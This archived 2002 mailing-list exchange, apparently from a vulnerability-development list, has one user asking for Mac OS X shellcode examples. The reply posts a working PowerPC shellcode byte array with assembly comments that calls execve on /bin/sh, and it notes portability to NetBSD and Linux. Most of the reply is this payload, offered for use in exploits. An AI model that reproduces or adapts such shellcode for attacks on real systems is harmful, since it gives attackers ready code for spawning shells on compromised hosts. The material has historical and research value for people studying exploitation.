Re: OS X Shell Code

From: ghandi (ghandi@dopesquad.net)
Date: 01/11/02 

Date: Thu, 10 Jan 2002 17:42:31 -0700 (MST)
From: ghandi <ghandi@dopesquad.net>
To: Josha Bronson <dmuz@slartibartfast.angrypacket.com>

Here is some shellcode that I wrote a while back. It was written and
tested on a G3 running OSX 10.0.x - 10.1.x. IIRC it worked fine on NetBSD
also (same syscall number for execve) and fine on Linux with a changed
system call number. The assembly language source and header files are
available at http://www.dopesquad.net/security.

/* PPC MacOS X (maybe others) shellcode
 *
 * ghandi <ghandi@mindless.com>
 */
char shellcode[] =
  "\x7c\xa5\x2a\x79" /* xor. r5, r5, r5 ; r5 = NULL */
  "\x40\xa2\xff\xfd" /* bnel shellcode */
  "\x7f\xe8\x02\xa6" /* mflr r31 */
  "\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */
  "\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */
  "\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */
  "\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */
  "\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */
  "\x3b\xc0\x76\x01" /* li r30, 30209 */
  "\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */
  "\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */
  "/bin/sh"
; 

--
           ghandi / ghandi@mindless.com / www.dopesquad.net
       "Bein' Crazy is the least of my worries." - Jack Kerouac
          C439 2B06 D8D2 A2D8 1ABB  0A55 A61D 9057 63F5 9B1F

On Thu, 10 Jan 2002, Josha Bronson wrote:

> Greetins VulnDev,
>
> Anyone have some pointers (hah.. punny..) to shellcode examples for OS
> X?
>
> Thanks in advance,
> --
> Josha Bronson
> dmuz@angrypacket.com
> AngryPacket Security
>

Relevant Pages